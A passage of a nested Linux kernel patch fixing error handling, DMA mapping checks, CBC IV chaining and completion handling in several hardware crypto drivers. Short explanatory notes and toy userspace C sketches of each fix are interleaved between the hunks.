+@@ -1163,7 +1233,16 @@ static int hisi_zip_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = hisi_zip_set_qm_algs(qm);
++	/* Fetch and save the value of capability registers */
++	ret = zip_pre_store_cap_reg(qm);
++	if (ret) {
++		pci_err(qm->pdev, "Failed to pre-store capability registers!\n");
++		hisi_qm_uninit(qm);
++		return ret;
++	}
++
++	alg_msk = qm->cap_tables.dev_cap_table[ZIP_DEV_ALG_BITMAP_IDX].cap_val;
++	ret = hisi_qm_set_algs(qm, alg_msk, zip_dev_algs, ARRAY_SIZE(zip_dev_algs));
+ 	if (ret) {
+ 		pci_err(qm->pdev, "Failed to set zip algs!\n");
+ 		hisi_qm_uninit(qm);
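
The hisi_zip rework above replaces repeated hisi_qm_get_hw_info() calls with a table of capability values read once at probe time. A minimal userspace sketch of that pre-store pattern; read_hw_cap() is a hypothetical stand-in for the real register read:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

enum cap_idx { CORE_NUM_IDX, COMP_NUM_IDX, DRV_ALG_IDX, CAP_TABLE_SIZE };

struct cap_record {
	uint32_t type;     /* which capability register */
	uint32_t cap_val;  /* its value, read once at probe */
};

static const uint32_t pre_store_caps[CAP_TABLE_SIZE] = { 0x0, 0x1, 0x2 };

/* Hypothetical stand-in for hisi_qm_get_hw_info(): a real driver would
 * read a capability register here. */
static uint32_t read_hw_cap(uint32_t type)
{
	return 0x100 + type;
}

static struct cap_record *pre_store_cap_regs(void)
{
	struct cap_record *tbl = calloc(CAP_TABLE_SIZE, sizeof(*tbl));

	if (!tbl)
		return NULL;
	for (int i = 0; i < CAP_TABLE_SIZE; i++) {
		tbl[i].type = pre_store_caps[i];
		tbl[i].cap_val = read_hw_cap(pre_store_caps[i]);
	}
	return tbl;
}

int main(void)
{
	struct cap_record *caps = pre_store_cap_regs();

	if (!caps)
		return 1;
	/* later users index the cached table instead of touching hardware */
	printf("core num cap: 0x%x\n", caps[CORE_NUM_IDX].cap_val);
	free(caps);
	return 0;
}
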
+diff --git a/drivers/crypto/inside-secure/safexcel_cipher.c b/drivers/crypto/inside-secure/safexcel_cipher.c
+index 32a37e3850c58..f59e32115268b 100644
+--- a/drivers/crypto/inside-secure/safexcel_cipher.c
++++ b/drivers/crypto/inside-secure/safexcel_cipher.c
+@@ -742,9 +742,9 @@ static int safexcel_send_req(struct crypto_async_request *base, int ring,
+ 				max(totlen_src, totlen_dst));
+ 			return -EINVAL;
+ 		}
+-		if (sreq->nr_src > 0)
+-			dma_map_sg(priv->dev, src, sreq->nr_src,
+-				   DMA_BIDIRECTIONAL);
++		if (sreq->nr_src > 0 &&
++		    !dma_map_sg(priv->dev, src, sreq->nr_src, DMA_BIDIRECTIONAL))
++			return -EIO;
+ 	} else {
+ 		if (unlikely(totlen_src && (sreq->nr_src <= 0))) {
+ 			dev_err(priv->dev, "Source buffer not large enough (need %d bytes)!",
+@@ -752,8 +752,9 @@ static int safexcel_send_req(struct crypto_async_request *base, int ring,
+ 			return -EINVAL;
+ 		}
+ 
+-		if (sreq->nr_src > 0)
+-			dma_map_sg(priv->dev, src, sreq->nr_src, DMA_TO_DEVICE);
++		if (sreq->nr_src > 0 &&
++		    !dma_map_sg(priv->dev, src, sreq->nr_src, DMA_TO_DEVICE))
++			return -EIO;
+ 
+ 		if (unlikely(totlen_dst && (sreq->nr_dst <= 0))) {
+ 			dev_err(priv->dev, "Dest buffer not large enough (need %d bytes)!",
+@@ -762,9 +763,11 @@ static int safexcel_send_req(struct crypto_async_request *base, int ring,
+ 			goto unmap;
+ 		}
+ 
+-		if (sreq->nr_dst > 0)
+-			dma_map_sg(priv->dev, dst, sreq->nr_dst,
+-				   DMA_FROM_DEVICE);
++		if (sreq->nr_dst > 0 &&
++		    !dma_map_sg(priv->dev, dst, sreq->nr_dst, DMA_FROM_DEVICE)) {
++			ret = -EIO;
++			goto unmap;
++		}
+ 	}
+ 
+ 	memcpy(ctx->base.ctxr->data, ctx->key, ctx->key_len);
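
The safexcel fix matters because dma_map_sg() returns 0 on failure, and the old code could submit unmapped buffers. The same check-then-unwind shape, sketched in plain C with hypothetical map_buf()/unmap_buf() helpers standing in for the DMA API:

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

/* map_buf()/unmap_buf() are made-up stand-ins for dma_map_sg()/
 * dma_unmap_sg(); like dma_map_sg(), mapping reports failure (NULL/0). */
static void *map_buf(size_t n) { return malloc(n); }
static void unmap_buf(void *p) { free(p); }

static int send_req(size_t src_len, size_t dst_len)
{
	void *src, *dst;
	int ret = 0;

	src = map_buf(src_len);
	if (!src)
		return -EIO;     /* nothing mapped yet, nothing to undo */

	dst = map_buf(dst_len);
	if (!dst) {
		ret = -EIO;
		goto unmap_src;  /* undo exactly what succeeded so far */
	}

	/* ... build descriptors, submit to hardware, wait ... */

	unmap_buf(dst);
unmap_src:
	unmap_buf(src);
	return ret;
}

int main(void)
{
	printf("send_req: %d\n", send_req(64, 64));
	return 0;
}
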
+diff --git a/drivers/crypto/sa2ul.c b/drivers/crypto/sa2ul.c
+index f4bc06c24ad8f..e7efebf8127f0 100644
+--- a/drivers/crypto/sa2ul.c
++++ b/drivers/crypto/sa2ul.c
+@@ -1868,9 +1868,8 @@ static int sa_aead_setkey(struct crypto_aead *authenc,
+ 	crypto_aead_set_flags(ctx->fallback.aead,
+ 			      crypto_aead_get_flags(authenc) &
+ 			      CRYPTO_TFM_REQ_MASK);
+-	crypto_aead_setkey(ctx->fallback.aead, key, keylen);
+ 
+-	return 0;
++	return crypto_aead_setkey(ctx->fallback.aead, key, keylen);
+ }
+ 
+ static int sa_aead_setauthsize(struct crypto_aead *tfm, unsigned int authsize)
+diff --git a/drivers/crypto/sahara.c b/drivers/crypto/sahara.c
+index 7ab20fb95166e..3b946f1313ed7 100644
+--- a/drivers/crypto/sahara.c
++++ b/drivers/crypto/sahara.c
+@@ -44,7 +44,6 @@
+ #define FLAGS_MODE_MASK		0x000f
+ #define FLAGS_ENCRYPT		BIT(0)
+ #define FLAGS_CBC		BIT(1)
+-#define FLAGS_NEW_KEY		BIT(3)
+ 
+ #define SAHARA_HDR_BASE			0x00800000
+ #define SAHARA_HDR_SKHA_ALG_AES	0
+@@ -142,8 +141,6 @@ struct sahara_hw_link {
+ };
+ 
+ struct sahara_ctx {
+-	unsigned long flags;
+-
+ 	/* AES-specific context */
+ 	int keylen;
+ 	u8 key[AES_KEYSIZE_128];
+@@ -152,6 +149,7 @@ struct sahara_ctx {
+ 
+ struct sahara_aes_reqctx {
+ 	unsigned long mode;
++	u8 iv_out[AES_BLOCK_SIZE];
+ 	struct skcipher_request fallback_req;	// keep at the end
+ };
+ 
+@@ -447,27 +445,24 @@ static int sahara_hw_descriptor_create(struct sahara_dev *dev)
+ 	int ret;
+ 	int i, j;
+ 	int idx = 0;
++	u32 len;
+ 
+-	/* Copy new key if necessary */
+-	if (ctx->flags & FLAGS_NEW_KEY) {
+-		memcpy(dev->key_base, ctx->key, ctx->keylen);
+-		ctx->flags &= ~FLAGS_NEW_KEY;
++	memcpy(dev->key_base, ctx->key, ctx->keylen);
+ 
+-		if (dev->flags & FLAGS_CBC) {
+-			dev->hw_desc[idx]->len1 = AES_BLOCK_SIZE;
+-			dev->hw_desc[idx]->p1 = dev->iv_phys_base;
+-		} else {
+-			dev->hw_desc[idx]->len1 = 0;
+-			dev->hw_desc[idx]->p1 = 0;
+-		}
+-		dev->hw_desc[idx]->len2 = ctx->keylen;
+-		dev->hw_desc[idx]->p2 = dev->key_phys_base;
+-		dev->hw_desc[idx]->next = dev->hw_phys_desc[1];
++	if (dev->flags & FLAGS_CBC) {
++		dev->hw_desc[idx]->len1 = AES_BLOCK_SIZE;
++		dev->hw_desc[idx]->p1 = dev->iv_phys_base;
++	} else {
++		dev->hw_desc[idx]->len1 = 0;
++		dev->hw_desc[idx]->p1 = 0;
++	}
++	dev->hw_desc[idx]->len2 = ctx->keylen;
++	dev->hw_desc[idx]->p2 = dev->key_phys_base;
++	dev->hw_desc[idx]->next = dev->hw_phys_desc[1];
++	dev->hw_desc[idx]->hdr = sahara_aes_key_hdr(dev);
+ 
+-		dev->hw_desc[idx]->hdr = sahara_aes_key_hdr(dev);
++	idx++;
+ 
+-		idx++;
+-	}
+ 
+ 	dev->nb_in_sg = sg_nents_for_len(dev->in_sg, dev->total);
+ 	if (dev->nb_in_sg < 0) {
+@@ -489,24 +484,27 @@ static int sahara_hw_descriptor_create(struct sahara_dev *dev)
+ 			 DMA_TO_DEVICE);
+ 	if (!ret) {
+ 		dev_err(dev->device, "couldn't map in sg\n");
+-		goto unmap_in;
++		return -EINVAL;
+ 	}
++
+ 	ret = dma_map_sg(dev->device, dev->out_sg, dev->nb_out_sg,
+ 			 DMA_FROM_DEVICE);
+ 	if (!ret) {
+ 		dev_err(dev->device, "couldn't map out sg\n");
+-		goto unmap_out;
++		goto unmap_in;
+ 	}
+ 
+ 	/* Create input links */
+ 	dev->hw_desc[idx]->p1 = dev->hw_phys_link[0];
+ 	sg = dev->in_sg;
++	len = dev->total;
+ 	for (i = 0; i < dev->nb_in_sg; i++) {
+-		dev->hw_link[i]->len = sg->length;
++		dev->hw_link[i]->len = min(len, sg->length);
+ 		dev->hw_link[i]->p = sg->dma_address;
+ 		if (i == (dev->nb_in_sg - 1)) {
+ 			dev->hw_link[i]->next = 0;
+ 		} else {
++			len -= min(len, sg->length);
+ 			dev->hw_link[i]->next = dev->hw_phys_link[i + 1];
+ 			sg = sg_next(sg);
+ 		}
+@@ -515,12 +513,14 @@ static int sahara_hw_descriptor_create(struct sahara_dev *dev)
+ 	/* Create output links */
+ 	dev->hw_desc[idx]->p2 = dev->hw_phys_link[i];
+ 	sg = dev->out_sg;
++	len = dev->total;
+ 	for (j = i; j < dev->nb_out_sg + i; j++) {
+-		dev->hw_link[j]->len = sg->length;
++		dev->hw_link[j]->len = min(len, sg->length);
+ 		dev->hw_link[j]->p = sg->dma_address;
+ 		if (j == (dev->nb_out_sg + i - 1)) {
+ 			dev->hw_link[j]->next = 0;
+ 		} else {
++			len -= min(len, sg->length);
+ 			dev->hw_link[j]->next = dev->hw_phys_link[j + 1];
+ 			sg = sg_next(sg);
+ 		}
+@@ -539,9 +539,6 @@ static int sahara_hw_descriptor_create(struct sahara_dev *dev)
+ 
+ 	return 0;
+ 
+-unmap_out:
+-	dma_unmap_sg(dev->device, dev->out_sg, dev->nb_out_sg,
+-		DMA_FROM_DEVICE);
+ unmap_in:
+ 	dma_unmap_sg(dev->device, dev->in_sg, dev->nb_in_sg,
+ 		DMA_TO_DEVICE);
+@@ -549,8 +546,24 @@ unmap_in:
+ 	return -EINVAL;
+ }
+ 
++static void sahara_aes_cbc_update_iv(struct skcipher_request *req)
++{
++	struct crypto_skcipher *skcipher = crypto_skcipher_reqtfm(req);
++	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
++	unsigned int ivsize = crypto_skcipher_ivsize(skcipher);
++
++	/* Update IV buffer to contain the last ciphertext block */
++	if (rctx->mode & FLAGS_ENCRYPT) {
++		sg_pcopy_to_buffer(req->dst, sg_nents(req->dst), req->iv,
++				   ivsize, req->cryptlen - ivsize);
++	} else {
++		memcpy(req->iv, rctx->iv_out, ivsize);
++	}
++}
++
+ static int sahara_aes_process(struct skcipher_request *req)
+ {
++	struct crypto_skcipher *skcipher = crypto_skcipher_reqtfm(req);
+ 	struct sahara_dev *dev = dev_ptr;
+ 	struct sahara_ctx *ctx;
+ 	struct sahara_aes_reqctx *rctx;
+@@ -572,8 +585,17 @@ static int sahara_aes_process(struct skcipher_request *req)
+ 	rctx->mode &= FLAGS_MODE_MASK;
+ 	dev->flags = (dev->flags & ~FLAGS_MODE_MASK) | rctx->mode;
+ 
+-	if ((dev->flags & FLAGS_CBC) && req->iv)
+-		memcpy(dev->iv_base, req->iv, AES_KEYSIZE_128);
++	if ((dev->flags & FLAGS_CBC) && req->iv) {
++		unsigned int ivsize = crypto_skcipher_ivsize(skcipher);
++
++		memcpy(dev->iv_base, req->iv, ivsize);
++
++		if (!(dev->flags & FLAGS_ENCRYPT)) {
++			sg_pcopy_to_buffer(req->src, sg_nents(req->src),
++					   rctx->iv_out, ivsize,
++					   req->cryptlen - ivsize);
++		}
++	}
+ 
+ 	/* assign new context to device */
+ 	dev->ctx = ctx;
+@@ -586,16 +608,20 @@ static int sahara_aes_process(struct skcipher_request *req)
+ 
+ 	timeout = wait_for_completion_timeout(&dev->dma_completion,
+ 				msecs_to_jiffies(SAHARA_TIMEOUT_MS));
+-	if (!timeout) {
+-		dev_err(dev->device, "AES timeout\n");
+-		return -ETIMEDOUT;
+-	}
+ 
+ 	dma_unmap_sg(dev->device, dev->out_sg, dev->nb_out_sg,
+ 		DMA_FROM_DEVICE);
+ 	dma_unmap_sg(dev->device, dev->in_sg, dev->nb_in_sg,
+ 		DMA_TO_DEVICE);
+ 
++	if (!timeout) {
++		dev_err(dev->device, "AES timeout\n");
++		return -ETIMEDOUT;
++	}
++
++	if ((dev->flags & FLAGS_CBC) && req->iv)
++		sahara_aes_cbc_update_iv(req);
++
+ 	return 0;
+ }
+ 
+@@ -609,7 +635,6 @@ static int sahara_aes_setkey(struct crypto_skcipher *tfm, const u8 *key,
+ 	/* SAHARA only supports 128bit keys */
+ 	if (keylen == AES_KEYSIZE_128) {
+ 		memcpy(ctx->key, key, keylen);
+-		ctx->flags |= FLAGS_NEW_KEY;
+ 		return 0;
+ 	}
+ 
+@@ -625,12 +650,40 @@ static int sahara_aes_setkey(struct crypto_skcipher *tfm, const u8 *key,
+ 	return crypto_skcipher_setkey(ctx->fallback, key, keylen);
+ }
+ 
++static int sahara_aes_fallback(struct skcipher_request *req, unsigned long mode)
++{
++	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
++	struct sahara_ctx *ctx = crypto_skcipher_ctx(
++		crypto_skcipher_reqtfm(req));
++
++	skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
++	skcipher_request_set_callback(&rctx->fallback_req,
++				      req->base.flags,
++				      req->base.complete,
++				      req->base.data);
++	skcipher_request_set_crypt(&rctx->fallback_req, req->src,
++				   req->dst, req->cryptlen, req->iv);
++
++	if (mode & FLAGS_ENCRYPT)
++		return crypto_skcipher_encrypt(&rctx->fallback_req);
++
++	return crypto_skcipher_decrypt(&rctx->fallback_req);
++}
++
+ static int sahara_aes_crypt(struct skcipher_request *req, unsigned long mode)
+ {
+ 	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
++	struct sahara_ctx *ctx = crypto_skcipher_ctx(
++		crypto_skcipher_reqtfm(req));
+ 	struct sahara_dev *dev = dev_ptr;
+ 	int err = 0;
+ 
++	if (!req->cryptlen)
++		return 0;
++
++	if (unlikely(ctx->keylen != AES_KEYSIZE_128))
++		return sahara_aes_fallback(req, mode);
++
+ 	dev_dbg(dev->device, "nbytes: %d, enc: %d, cbc: %d\n",
+ 		req->cryptlen, !!(mode & FLAGS_ENCRYPT), !!(mode & FLAGS_CBC));
+ 
+@@ -653,81 +706,21 @@ static int sahara_aes_crypt(struct skcipher_request *req, unsigned long mode)
+ 
+ static int sahara_aes_ecb_encrypt(struct skcipher_request *req)
+ {
+-	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
+-	struct sahara_ctx *ctx = crypto_skcipher_ctx(
+-		crypto_skcipher_reqtfm(req));
+-
+-	if (unlikely(ctx->keylen != AES_KEYSIZE_128)) {
+-		skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
+-		skcipher_request_set_callback(&rctx->fallback_req,
+-					      req->base.flags,
+-					      req->base.complete,
+-					      req->base.data);
+-		skcipher_request_set_crypt(&rctx->fallback_req, req->src,
+-					   req->dst, req->cryptlen, req->iv);
+-		return crypto_skcipher_encrypt(&rctx->fallback_req);
+-	}
+-
+ 	return sahara_aes_crypt(req, FLAGS_ENCRYPT);
+ }
+ 
+ static int sahara_aes_ecb_decrypt(struct skcipher_request *req)
+ {
+-	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
+-	struct sahara_ctx *ctx = crypto_skcipher_ctx(
+-		crypto_skcipher_reqtfm(req));
+-
+-	if (unlikely(ctx->keylen != AES_KEYSIZE_128)) {
+-		skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
+-		skcipher_request_set_callback(&rctx->fallback_req,
+-					      req->base.flags,
+-					      req->base.complete,
+-					      req->base.data);
+-		skcipher_request_set_crypt(&rctx->fallback_req, req->src,
+-					   req->dst, req->cryptlen, req->iv);
+-		return crypto_skcipher_decrypt(&rctx->fallback_req);
+-	}
+-
+ 	return sahara_aes_crypt(req, 0);
+ }
+ 
+ static int sahara_aes_cbc_encrypt(struct skcipher_request *req)
+ {
+-	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
+-	struct sahara_ctx *ctx = crypto_skcipher_ctx(
+-		crypto_skcipher_reqtfm(req));
+-
+-	if (unlikely(ctx->keylen != AES_KEYSIZE_128)) {
+-		skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
+-		skcipher_request_set_callback(&rctx->fallback_req,
+-					      req->base.flags,
+-					      req->base.complete,
+-					      req->base.data);
+-		skcipher_request_set_crypt(&rctx->fallback_req, req->src,
+-					   req->dst, req->cryptlen, req->iv);
+-		return crypto_skcipher_encrypt(&rctx->fallback_req);
+-	}
+-
+ 	return sahara_aes_crypt(req, FLAGS_ENCRYPT | FLAGS_CBC);
+ }
+ 
+ static int sahara_aes_cbc_decrypt(struct skcipher_request *req)
+ {
+-	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
+-	struct sahara_ctx *ctx = crypto_skcipher_ctx(
+-		crypto_skcipher_reqtfm(req));
+-
+-	if (unlikely(ctx->keylen != AES_KEYSIZE_128)) {
+-		skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
+-		skcipher_request_set_callback(&rctx->fallback_req,
+-					      req->base.flags,
+-					      req->base.complete,
+-					      req->base.data);
+-		skcipher_request_set_crypt(&rctx->fallback_req, req->src,
+-					   req->dst, req->cryptlen, req->iv);
+-		return crypto_skcipher_decrypt(&rctx->fallback_req);
+-	}
+-
+ 	return sahara_aes_crypt(req, FLAGS_CBC);
+ }
+ 
+@@ -784,6 +777,7 @@ static int sahara_sha_hw_links_create(struct sahara_dev *dev,
+ 				       int start)
+ {
+ 	struct scatterlist *sg;
++	unsigned int len;
+ 	unsigned int i;
+ 	int ret;
+ 
+@@ -805,12 +799,14 @@ static int sahara_sha_hw_links_create(struct sahara_dev *dev,
+ 	if (!ret)
+ 		return -EFAULT;
+ 
++	len = rctx->total;
+ 	for (i = start; i < dev->nb_in_sg + start; i++) {
+-		dev->hw_link[i]->len = sg->length;
++		dev->hw_link[i]->len = min(len, sg->length);
+ 		dev->hw_link[i]->p = sg->dma_address;
+ 		if (i == (dev->nb_in_sg + start - 1)) {
+ 			dev->hw_link[i]->next = 0;
+ 		} else {
++			len -= min(len, sg->length);
+ 			dev->hw_link[i]->next = dev->hw_phys_link[i + 1];
+ 			sg = sg_next(sg);
+ 		}
+@@ -891,24 +887,6 @@ static int sahara_sha_hw_context_descriptor_create(struct sahara_dev *dev,
+ 	return 0;
+ }
+ 
+-static int sahara_walk_and_recalc(struct scatterlist *sg, unsigned int nbytes)
+-{
+-	if (!sg || !sg->length)
+-		return nbytes;
+-
+-	while (nbytes && sg) {
+-		if (nbytes <= sg->length) {
+-			sg->length = nbytes;
+-			sg_mark_end(sg);
+-			break;
+-		}
+-		nbytes -= sg->length;
+-		sg = sg_next(sg);
+-	}
+-
+-	return nbytes;
+-}
+-
+ static int sahara_sha_prepare_request(struct ahash_request *req)
+ {
+ 	struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
+@@ -945,36 +923,20 @@ static int sahara_sha_prepare_request(struct ahash_request *req)
+ 					hash_later, 0);
+ 	}
+ 
+-	/* nbytes should now be multiple of blocksize */
+-	req->nbytes = req->nbytes - hash_later;
+-
+-	sahara_walk_and_recalc(req->src, req->nbytes);
+-
++	rctx->total = len - hash_later;
+ 	/* have data from previous operation and current */
+ 	if (rctx->buf_cnt && req->nbytes) {
+ 		sg_init_table(rctx->in_sg_chain, 2);
+ 		sg_set_buf(rctx->in_sg_chain, rctx->rembuf, rctx->buf_cnt);
+-
+ 		sg_chain(rctx->in_sg_chain, 2, req->src);
+-
+-		rctx->total = req->nbytes + rctx->buf_cnt;
+ 		rctx->in_sg = rctx->in_sg_chain;
+-
+-		req->src = rctx->in_sg_chain;
+ 	/* only data from previous operation */
+ 	} else if (rctx->buf_cnt) {
+-		if (req->src)
+-			rctx->in_sg = req->src;
+-		else
+-			rctx->in_sg = rctx->in_sg_chain;
+-		/* buf was copied into rembuf above */
++		rctx->in_sg = rctx->in_sg_chain;
+ 		sg_init_one(rctx->in_sg, rctx->rembuf, rctx->buf_cnt);
+-		rctx->total = rctx->buf_cnt;
+ 	/* no data from previous operation */
+ 	} else {
+ 		rctx->in_sg = req->src;
+-		rctx->total = req->nbytes;
+-		req->src = rctx->in_sg;
+ 	}
+ 
+ 	/* on next call, we only have the remaining data in the buffer */
+@@ -995,7 +957,10 @@ static int sahara_sha_process(struct ahash_request *req)
+ 		return ret;
+ 
+ 	if (rctx->first) {
+-		sahara_sha_hw_data_descriptor_create(dev, rctx, req, 0);
++		ret = sahara_sha_hw_data_descriptor_create(dev, rctx, req, 0);
++		if (ret)
++			return ret;
++
+ 		dev->hw_desc[0]->next = 0;
+ 		rctx->first = 0;
+ 	} else {
+@@ -1003,7 +968,10 @@ static int sahara_sha_process(struct ahash_request *req)
+ 
+ 		sahara_sha_hw_context_descriptor_create(dev, rctx, req, 0);
+ 		dev->hw_desc[0]->next = dev->hw_phys_desc[1];
+-		sahara_sha_hw_data_descriptor_create(dev, rctx, req, 1);
++		ret = sahara_sha_hw_data_descriptor_create(dev, rctx, req, 1);
++		if (ret)
++			return ret;
++
+ 		dev->hw_desc[1]->next = 0;
+ 	}
+ 
+@@ -1016,18 +984,19 @@ static int sahara_sha_process(struct ahash_request *req)
+ 
+ 	timeout = wait_for_completion_timeout(&dev->dma_completion,
+ 				msecs_to_jiffies(SAHARA_TIMEOUT_MS));
+-	if (!timeout) {
+-		dev_err(dev->device, "SHA timeout\n");
+-		return -ETIMEDOUT;
+-	}
+ 
+ 	if (rctx->sg_in_idx)
+ 		dma_unmap_sg(dev->device, dev->in_sg, dev->nb_in_sg,
+ 			     DMA_TO_DEVICE);
+ 
++	if (!timeout) {
++		dev_err(dev->device, "SHA timeout\n");
++		return -ETIMEDOUT;
++	}
++
+ 	memcpy(rctx->context, dev->context_base, rctx->context_size);
+ 
+-	if (req->result)
++	if (req->result && rctx->last)
+ 		memcpy(req->result, rctx->context, rctx->digest_size);
+ 
+ 	return 0;
+@@ -1171,8 +1140,7 @@ static int sahara_sha_import(struct ahash_request *req, const void *in)
+ static int sahara_sha_cra_init(struct crypto_tfm *tfm)
+ {
+ 	crypto_ahash_set_reqsize(__crypto_ahash_cast(tfm),
+-				 sizeof(struct sahara_sha_reqctx) +
+-				 SHA_BUFFER_LEN + SHA256_BLOCK_SIZE);
++				 sizeof(struct sahara_sha_reqctx));
+ 
+ 	return 0;
+ }
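
Several of the sahara changes above deal with CBC IV chaining: after each operation the request IV must become the last ciphertext block, and for in-place decryption that block has to be saved before it is overwritten (the new iv_out field). A toy demonstration with a do-nothing XOR "cipher" -- not cryptography, only the chaining bookkeeping:

#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define BS 4 /* toy block size */

/* Toy "block cipher": XOR with the key. Just enough structure to show
 * the CBC chaining the driver now gets right. */
static void blk_enc(uint8_t *b, const uint8_t *k)
{
	for (int i = 0; i < BS; i++)
		b[i] ^= k[i];
}
#define blk_dec blk_enc /* XOR is its own inverse */

static void cbc_enc(uint8_t *d, size_t len, const uint8_t *k, uint8_t *iv)
{
	for (size_t off = 0; off < len; off += BS) {
		for (int i = 0; i < BS; i++)
			d[off + i] ^= iv[i];
		blk_enc(d + off, k);
		memcpy(iv, d + off, BS); /* next IV = last ciphertext block */
	}
}

static void cbc_dec(uint8_t *d, size_t len, const uint8_t *k, uint8_t *iv)
{
	uint8_t save[BS];

	for (size_t off = 0; off < len; off += BS) {
		/* save ciphertext before decrypting in place (the iv_out idea) */
		memcpy(save, d + off, BS);
		blk_dec(d + off, k);
		for (int i = 0; i < BS; i++)
			d[off + i] ^= iv[i];
		memcpy(iv, save, BS);
	}
}

int main(void)
{
	uint8_t key[BS] = "KEY!", iv0[BS] = "IV..", iv[BS];
	uint8_t msg[8] = "ABCDEFGH", one[8], two[8];

	memcpy(one, msg, 8);
	memcpy(two, msg, 8);

	memcpy(iv, iv0, BS);          /* one-shot encryption */
	cbc_enc(one, 8, key, iv);

	memcpy(iv, iv0, BS);          /* same data in two requests: matches */
	cbc_enc(two, 4, key, iv);     /* only because the IV is carried over */
	cbc_enc(two + 4, 4, key, iv);
	printf("chunked == one-shot: %s\n", memcmp(one, two, 8) ? "no" : "yes");

	memcpy(iv, iv0, BS);          /* chunked in-place decryption */
	cbc_dec(two, 4, key, iv);
	cbc_dec(two + 4, 4, key, iv);
	printf("round trip ok:       %s\n", memcmp(two, msg, 8) ? "no" : "yes");
	return 0;
}
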
+diff --git a/drivers/crypto/virtio/virtio_crypto_common.h b/drivers/crypto/virtio/virtio_crypto_common.h
+index 154590e1f7643..7059bbe5a2eba 100644
+--- a/drivers/crypto/virtio/virtio_crypto_common.h
++++ b/drivers/crypto/virtio/virtio_crypto_common.h
+@@ -10,6 +10,7 @@
+ #include <linux/virtio.h>
+ #include <linux/crypto.h>
+ #include <linux/spinlock.h>
++#include <linux/interrupt.h>
+ #include <crypto/aead.h>
+ #include <crypto/aes.h>
+ #include <crypto/engine.h>
+@@ -28,6 +29,7 @@ struct data_queue {
+ 	char name[32];
+ 
+ 	struct crypto_engine *engine;
++	struct tasklet_struct done_task;
+ };
+ 
+ struct virtio_crypto {
+diff --git a/drivers/crypto/virtio/virtio_crypto_core.c b/drivers/crypto/virtio/virtio_crypto_core.c
+index 3842915ea7437..56dc0935c774a 100644
+--- a/drivers/crypto/virtio/virtio_crypto_core.c
++++ b/drivers/crypto/virtio/virtio_crypto_core.c
+@@ -72,27 +72,28 @@ int virtio_crypto_ctrl_vq_request(struct virtio_crypto *vcrypto, struct scatterl
+ 	return 0;
+ }
+ 
+-static void virtcrypto_dataq_callback(struct virtqueue *vq)
++static void virtcrypto_done_task(unsigned long data)
+ {
+-	struct virtio_crypto *vcrypto = vq->vdev->priv;
++	struct data_queue *data_vq = (struct data_queue *)data;
++	struct virtqueue *vq = data_vq->vq;
+ 	struct virtio_crypto_request *vc_req;
+-	unsigned long flags;
+ 	unsigned int len;
+-	unsigned int qid = vq->index;
+ 
+-	spin_lock_irqsave(&vcrypto->data_vq[qid].lock, flags);
+ 	do {
+ 		virtqueue_disable_cb(vq);
+ 		while ((vc_req = virtqueue_get_buf(vq, &len)) != NULL) {
+-			spin_unlock_irqrestore(
+-				&vcrypto->data_vq[qid].lock, flags);
+ 			if (vc_req->alg_cb)
+ 				vc_req->alg_cb(vc_req, len);
+-			spin_lock_irqsave(
+-				&vcrypto->data_vq[qid].lock, flags);
+ 		}
+ 	} while (!virtqueue_enable_cb(vq));
+-	spin_unlock_irqrestore(&vcrypto->data_vq[qid].lock, flags);
++}
++
++static void virtcrypto_dataq_callback(struct virtqueue *vq)
++{
++	struct virtio_crypto *vcrypto = vq->vdev->priv;
++	struct data_queue *dq = &vcrypto->data_vq[vq->index];
++
++	tasklet_schedule(&dq->done_task);
+ }
+ 
+ static int virtcrypto_find_vqs(struct virtio_crypto *vi)
+@@ -150,6 +151,8 @@ static int virtcrypto_find_vqs(struct virtio_crypto *vi)
+ 			ret = -ENOMEM;
+ 			goto err_engine;
+ 		}
++		tasklet_init(&vi->data_vq[i].done_task, virtcrypto_done_task,
++				(unsigned long)&vi->data_vq[i]);
+ 	}
+ 
+ 	kfree(names);
+@@ -496,12 +499,15 @@ static void virtcrypto_free_unused_reqs(struct virtio_crypto *vcrypto)
+ static void virtcrypto_remove(struct virtio_device *vdev)
+ {
+ 	struct virtio_crypto *vcrypto = vdev->priv;
++	int i;
+ 
+ 	dev_info(&vdev->dev, "Start virtcrypto_remove.\n");
+ 
+ 	flush_work(&vcrypto->config_work);
+ 	if (virtcrypto_dev_started(vcrypto))
+ 		virtcrypto_dev_stop(vcrypto);
++	for (i = 0; i < vcrypto->max_data_queues; i++)
++		tasklet_kill(&vcrypto->data_vq[i].done_task);
+ 	virtio_reset_device(vdev);
+ 	virtcrypto_free_unused_reqs(vcrypto);
+ 	virtcrypto_clear_crypto_engines(vcrypto);
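
The virtio-crypto change moves completion processing out of the virtqueue interrupt callback into a tasklet. A rough userspace analogue of that split -- the "IRQ" path only records work and marks itself pending, while the heavier per-request handling runs later:

#include <stdio.h>

#define QDEPTH 8

static int completions[QDEPTH];
static unsigned int head, tail;
static int pending;

static void dataq_callback(int req_id)
{
	completions[tail++ % QDEPTH] = req_id; /* keep "IRQ" context short */
	pending = 1;                           /* tasklet_schedule() analogue */
}

static void done_task(void)
{
	while (head != tail) {
		int id = completions[head++ % QDEPTH];

		printf("completing request %d\n", id); /* alg_cb() analogue */
	}
	pending = 0;
}

int main(void)
{
	dataq_callback(1);
	dataq_callback(2);
	if (pending)
		done_task();
	return 0;
}
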
+diff --git a/drivers/cxl/core/port.c b/drivers/cxl/core/port.c
+index bd41424319807..1f1483a9e5252 100644
+--- a/drivers/cxl/core/port.c
++++ b/drivers/cxl/core/port.c
+@@ -1403,7 +1403,7 @@ static int decoder_populate_targets(struct cxl_switch_decoder *cxlsd,
+ 		return -EINVAL;
+ 
